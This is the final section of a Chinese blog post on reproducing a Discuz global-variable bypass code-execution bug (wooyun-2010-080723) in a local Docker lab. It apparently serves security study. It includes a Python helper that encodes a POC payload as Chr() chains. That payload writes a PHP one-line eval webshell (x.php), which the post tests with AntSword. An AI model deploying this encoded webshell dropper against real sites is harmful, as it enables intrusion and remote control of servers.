<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker-compose ps     //查看当前正在运行的容器列表，确认正确的容器ID或名称</span><br><span class="line">docker exec -it wooyun-2010-080723-discuz-1 /bin/sh   //进入容器ID为 &#x27;wooyun-2010-080723-discuz-1&#x27; 的容器内部，并打开一个交互式的 shell 终端</span><br></pre></td></tr></table></figure>

<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915191710237.png" alt="image-20250915191710237" data-caption="image-20250915191710237" loading="lazy"></p>
<p>生成了一句话木马。蚁剑测试。<a target="_blank" rel="noopener" href="http://192.168.196.128:8080/x.php">http://192.168.196.128:8080/x.php</a></p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915192037055.png" alt="image-20250915192037055" data-caption="image-20250915192037055" loading="lazy"></p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915192050570.png" alt="image-20250915192050570" data-caption="image-20250915192050570" loading="lazy"></p>
<h2 id="poc文件"><a href="#poc文件" class="headerlink" title="poc文件"></a>poc文件</h2><p>ASCII码和字符互相转换的小脚本，方便修改POC的文件名和密码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="comment"># ASCII = ord(Word)</span></span><br><span class="line"><span class="comment"># Word = chr(ASCII)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># ASCII -&gt; Word</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ASCII2word</span>(<span class="params">ASCIIs</span>):</span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> re.findall(<span class="string">r&quot;(\d+)&quot;</span>, ASCIIs):</span><br><span class="line">        <span class="built_in">print</span>(<span class="built_in">chr</span>(<span class="built_in">int</span>(c)),end=<span class="string">&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Word -&gt; ASCII</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">word2ASCII</span>(<span class="params">words</span>):</span><br><span class="line">    ASCIIs = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> word <span class="keyword">in</span> words:</span><br><span class="line">        ASCIIs += <span class="string">&quot;Chr(&quot;</span> + <span class="built_in">str</span>(<span class="built_in">ord</span>(word)) + <span class="string">&quot;).&quot;</span></span><br><span class="line">    <span class="built_in">print</span>(ASCIIs)</span><br><span class="line"></span><br><span class="line">asciis = <span class="string">&quot;Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(109).Chr(105).Chr(115).Chr(104).Chr(105).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(116).Chr(101).Chr(115).Chr(116).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)&quot;</span></span><br><span class="line">ASCII2word(asciis)</span><br><span class="line"></span><br><span class="line">words = <span class="string">&quot;fputs(fopen(&#x27;x.php&#x27;,&#x27;w&#x27;),&#x27;&lt;?php @eval($_POST[pwd])?&gt;&#x27;);&quot;</span></span><br><span class="line">word2ASCII(words)</span><br></pre></td></tr></table></figure>

<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915200332810.png" alt="image-20250915200332810" data-caption="image-20250915200332810" loading="lazy"></p>
<h2 id="停止并删除容器"><a href="#停止并删除容器" class="headerlink" title="停止并删除容器"></a>停止并删除容器</h2><p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915195514881.png" alt="image-20250915195514881" data-caption="image-20250915195514881" loading="lazy"></p>

    
  </article>

  
      

  
  
  <div class="nexmoe-post-meta nexmoe-rainbow">
   
    
        <a class="nexmoefont icon-tag-fill -none-link" href="/tags/Cookie-GLOBALS/" rel="tag">Cookie--GLOBALS</a> <a class="nexmoefont icon-tag-fill -none-link" href="/tags/docker%E4%BA%A4%E4%BA%92%E5%BC%8Fshell/" rel="tag">docker交互式shell</a>
    
</div>
  
  
    <script async src="/js/copy-codeblock.js?v=1765792268109"></script>
  

  
      <div class="nexmoe-post-footer">
          
      </div>
  
</div></div><div class="nexmoe-post-right">    <div class="nexmoe-fixed">
        <div class="nexmoe-tool">

            

            
            
            <button class="mdui-fab catalog" style="overflow:unset;">
                <i class="nexmoefont icon-i-catalog"></i>
                <div class="nexmoe-toc">
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#discuz%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E9%98%B2%E5%BE%A1%E7%BB%95%E8%BF%87%E5%AF%BC%E8%87%B4%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C-wooyun-2010-080723"><span class="toc-number">1.</span> <span class="toc-text">discuz全局变量防御绕过导致代码执行(wooyun-2010-080723)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%8D%E7%BD%AE"><span class="toc-number">1.1.</span> <span class="toc-text">位置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-number">1.2.</span> <span class="toc-text">漏洞原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC"><span class="toc-number">1.3.</span> <span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.4.</span> <span class="toc-text">漏洞复现</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BC%80%E5%90%AF%E7%8E%AF%E5%A2%83"><span class="toc-number">2.</span> <span class="toc-text">开启环境</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">2.1.</span> <span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%A8%E9%A9%AC%E6%96%87%E4%BB%B6"><span class="toc-number">2.2.</span> <span class="toc-text">木马文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#poc%E6%96%87%E4%BB%B6"><span class="toc-number">2.3.</span> <span class="toc-text">poc文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%81%9C%E6%AD%A2%E5%B9%B6%E5%88%A0%E9%99%A4%E5%AE%B9%E5%99%A8"><span class="toc-number">2.4.</span> <span class="toc-text">停止并删除容器</span></a></li></ol></li></ol>
                </div>
            </button>
            

            

            <a href="#nexmoe-content" class="backtop toc-link" aria-label="Back To Top" title="top"><button class="mdui-fab mdui-ripple"><i class="nexmoefont icon-caret-top"></i></button></a>
        </div>
    </div>
</div></div><div id="nexmoe-footer"><!--!--></div><div id="nexmoe-search-space"><div class="search-container"><div class="search-header"><div class="search-input-container"><input class="search-input" type="text" placeholder="搜索" onInput="sinput();"></div><a class="search-close" onclick="sclose();">×</a></div><div class="search-body"></div></div></div><div><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2058306854838448" crossorigin="anonymous"></script>
</div></body></html>